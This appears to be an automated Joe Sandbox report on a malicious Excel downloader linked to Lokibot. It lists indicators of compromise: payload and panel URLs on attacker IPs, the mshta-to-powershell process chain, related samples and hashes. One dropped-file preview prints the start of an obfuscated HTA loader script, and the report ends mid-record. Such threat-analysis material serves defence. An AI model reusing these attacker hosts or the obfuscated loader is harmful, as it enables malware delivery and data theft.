                        http://kbfvzoboss.bid/alien/fre.phptrue
                          unknown
                          http://alphastand.top/alien/fre.phptrue
                            unknown
                            true
                              unknown
                              http://alphastand.win/alien/fre.phptrue
                                unknown
                                http://alphastand.trade/alien/fre.phptrue
                                  unknown
                                  http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htatrue
                                    unknown
                                    http://94.156.177.220/simple/five/fre.phptrue
                                      unknown
                                      http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFtrue
                                        unknown
                                        http://192.3.176.141/35/SMLPERR.txttrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htafmshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htagmshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://192.3.176.141/35/educatiopowershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIFppowershell.exe, 00000006.00000002.452706193.0000000003806000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://mpa.li/mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://192.3.176.141/mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://ocsp.entrust.net03mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta_mshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.ibsensoftware.com/AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htawmshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htalmshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://go.microspowershell.exe, 00000006.00000002.452706193.0000000002E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF34e089rpowershell.exe, 00000006.00000002.456851525.000000001A9FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htakmshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGmshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://mpa.li/C:Tmshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaAmshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://192.3.176.141/Zmshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htahttp://192.3.176.mshta.exe, 00000004.00000003.418291417.0000000002975000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://contoso.com/powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.452706193.000000000223C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.456451970.0000000012061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta...mshta.exe, 00000004.00000003.417828782.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.00000000037D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://drive.google.compowershell.exe, 0000000F.00000002.502500723.0000000002652000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://drive.usercontent.google.compowershell.exe, 0000000F.00000002.502500723.000000000281A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://192.3.176.141/35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.htaSmshta.exe, 00000004.00000003.418148020.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417810676.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418985006.00000000037F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.452706193.0000000002031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.604737245.000000000237E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.502500723.0000000002451000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.417828782.0000000003786000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.418820282.0000000003786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://mpa.li/6432Hmshta.exe, 00000004.00000002.418493230.0000000000355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418169581.0000000000355000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          192.3.176.141
                                                                                          unknownUnited States
                                                                                          36352AS-COLOCROSSINGUStrue
                                                                                          142.250.186.46
                                                                                          drive.google.comUnited States
                                                                                          15169GOOGLEUSfalse
                                                                                          5.159.62.244
                                                                                          mpa.liGermany
                                                                                          59507TLN-ASDEfalse
                                                                                          5.159.62.243
                                                                                          unknownGermany
                                                                                          59507TLN-ASDEfalse
                                                                                          94.156.177.220
                                                                                          unknownBulgaria
                                                                                          43561NET1-ASBGtrue
                                                                                          172.217.16.193
                                                                                          drive.usercontent.google.comUnited States
                                                                                          15169GOOGLEUSfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1541460
                                                                                          Start date and time:2024-10-24 21:21:21 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 15s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                          Number of analysed new started processes analysed:19
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • GSI enabled (VBA)
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winXLSX@18/28@4/6
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 66.7%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 48
                                                                                          • Number of non-executed functions: 4
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .xlsx
                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                          • Attach to Office via COM
                                                                                          • Active ActiveX Object
                                                                                          • Active ActiveX Object
                                                                                          • Scroll down
                                                                                          • Close Viewer
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                                          • Execution Graph export aborted for target mshta.exe, PID 3868 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
                                                                                          TimeTypeDescription
                                                                                          15:22:37API Interceptor78x Sleep call for process: mshta.exe modified
                                                                                          15:22:43API Interceptor548x Sleep call for process: powershell.exe modified
                                                                                          15:22:57API Interceptor7x Sleep call for process: wscript.exe modified
                                                                                          15:23:23API Interceptor462x Sleep call for process: AddInProcess32.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          192.3.176.141Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                          • 192.3.176.141/36/LOGS%20LOKI.txt
                                                                                          Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                          • 192.3.176.141/43/LCRDDFR.txt
                                                                                          logicalwayofgreatthingswhichcreatedwithgreatwayofgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                          • 192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
                                                                                          greatwayforbestthignswithwhonotwanttodo.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                          • 192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
                                                                                          PPM435679.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.176.141/551/cw/nicevisionnicemagicalthinsforentirelifetogetmebackwithgreat.hta
                                                                                          Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.176.141/550/cw/fullofconfidentwithgreatnicethingswedonewithgreatattitude.hta
                                                                                          Payment Advice080.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.176.141/456/cs/verynicesweetgirlsareeverywheretogetmein.hta
                                                                                          Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.176.141/455/ed/createnewthingswithmygrilstobeinline.hta
                                                                                          Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
                                                                                          Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 192.3.176.141/233/cbn/nicegirlwithgreatthingonthisdealingfgood.hta
                                                                                          5.159.62.244Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                            5.159.62.243Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              94.156.177.220Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220/logs/five/fre.php
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220/logs/five/fre.php
                                                                                              SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220/skipo/five/fre.php
                                                                                              17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220/logs/five/fre.php
                                                                                              New Order.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220/skipo/five/fre.php
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              mpa.liShipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 5.159.62.244
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              AS-COLOCROSSINGUSSecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 107.175.113.214
                                                                                              Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                              • 192.210.150.14
                                                                                              bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 192.210.187.71
                                                                                              bot.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 192.210.187.71
                                                                                              bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 192.210.187.71
                                                                                              transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 107.172.31.13
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 192.3.216.142
                                                                                              Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 198.46.178.134
                                                                                              Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 192.3.176.141
                                                                                              A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 192.210.215.8
                                                                                              TLN-ASDEShipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 5.159.62.243
                                                                                              zDAH4anUtC.elfGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.88.227
                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.88.221
                                                                                              arm7.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.226
                                                                                              hR6s75mYfS.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.234
                                                                                              sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.221
                                                                                              zMtlCW3JE2.exeGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.57.195
                                                                                              x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.220
                                                                                              TV9gyhWdj9.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.230
                                                                                              gWG8IWTQvp.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.202
                                                                                              TLN-ASDEShipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 5.159.62.243
                                                                                              zDAH4anUtC.elfGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.88.227
                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.88.221
                                                                                              arm7.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.226
                                                                                              hR6s75mYfS.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.234
                                                                                              sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.221
                                                                                              zMtlCW3JE2.exeGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.57.195
                                                                                              x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.220
                                                                                              TV9gyhWdj9.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.230
                                                                                              gWG8IWTQvp.elfGet hashmaliciousMiraiBrowse
                                                                                              • 5.159.88.202
                                                                                              NET1-ASBGsample.binGet hashmaliciousOkiruBrowse
                                                                                              • 93.123.85.166
                                                                                              Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220
                                                                                              SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220
                                                                                              17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220
                                                                                              hZ6ZMDS1rc.exeGet hashmaliciousAsyncRATBrowse
                                                                                              • 93.123.39.76
                                                                                              New Order.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220
                                                                                              boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                              • 93.123.85.38
                                                                                              boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                              • 93.123.85.38
                                                                                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                              • 93.123.85.38
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              05af1f5ca1b87cc9cc9b25185115607dREVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 142.250.186.46
                                                                                              • 172.217.16.193
                                                                                              7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 5.159.62.244
                                                                                              • 5.159.62.243
                                                                                              No context
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):4742
                                                                                              Entropy (8bit):4.8105940880640246
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                              Malicious:false
                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):0.34726597513537405
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Nlll:Nll
                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):133649
                                                                                              Entropy (8bit):2.1533183691243516
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T
                                                                                              MD5:401FA9878282B2404925D1AC2599B7C0
                                                                                              SHA1:876D5EA4B89EF48CD614FC098154E3E2CAA176F3
                                                                                              SHA-256:B8E2FC58AFA34CD0E92AA8A763D8CD49E240B47330EB2DA9651E04150BD04948
                                                                                              SHA-512:45E2DE1E196AE5339DF31581BD8E98AF094AB461F80269A815F369E51E131A885BB9745C60375AA4C95DB75E82D58F799C5AE480AC2AA0B8387BAA2AEA2D0F63
                                                                                              Malicious:true
                                                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScriPT%252520LAnGuAGE%25253D%252522VbSCriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):141118
                                                                                              Entropy (8bit):3.6910993454239835
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:airLgt5pUGwjz5D7euCuqhYJ5PcJXqlgLR+eAMiKGG2:yYJBc5qlgLAY2
                                                                                              MD5:FE9E18E3366CA7AC8C21EB1CE0631D9C
                                                                                              SHA1:51BC2BC37E87E2D64129CAD63DF697A68EE3B9D6
